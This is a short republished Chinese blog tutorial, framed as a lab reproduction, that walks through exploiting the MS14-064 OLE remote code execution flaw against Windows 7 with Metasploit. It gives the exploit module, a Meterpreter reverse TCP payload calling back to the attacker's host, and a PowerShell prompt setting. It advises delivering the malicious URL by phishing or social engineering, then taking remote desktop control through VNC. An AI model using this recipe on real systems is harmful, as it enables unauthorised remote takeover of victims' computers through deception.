漏洞復現:MS14-064 OLE遠程代碼執行漏洞



MS14-064OLE遠程代碼執行漏洞

 

 

 

 

攻擊機:Kali Linux 2019

靶機:Windows 7 x64、x32

攻擊步驟:

1.打開攻擊機Kali Linux 2019系統和靶機Windows 7系統

 

 

 2.確定IP地址后,Kali Linux開啟msf模塊,准備攻擊測試

 

 

3.在這里我們使用MS14-064OLE遠程代碼執行漏洞,開始搜索MS14-064

 

(search MS14-064)

 

 

 

 4.我們利用use exploit/windows/browser/ms14_064_ole_code_execution  加載漏洞利用模塊

use exploit/windows/browser/ms14_064_ole_code_execution

 

 

 

 

 

5.查看詳細配置,進行下一步的詳細配置

 

 

 6.開始配置payload,Payload下的LHOST地址和模塊下的SRVHOST地址

(Payload:set payload windows/meterpreter/reverse_tcp)

(LHOST地址:Kali Linux IP地址)

(SRVHOST地址:Kali Linux IP地址)

 

 

 7.注意一下上圖這個箭頭位置,要把其中的默認false熟悉改為true,因為msf中自帶的漏洞是利用exp調用的是powershell,所以msf的exp代碼只對安裝了powershell的系統生效,這里我們來用windows 7 系統進行測試。

(命令:set ALlowPowershellPrompt true)

 

 

 8.輸入exploit 進行測試,會生成一個url鏈接,用釣魚方法或者是社會工程學傳到Win7主機里,就可以實現控制

 

 

 

 

 

 

 

 

 9.提取到權限,滲透完成,可以進行遠程桌面操控,觀察操作桌面等

(run vnc 觀察操作界面)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM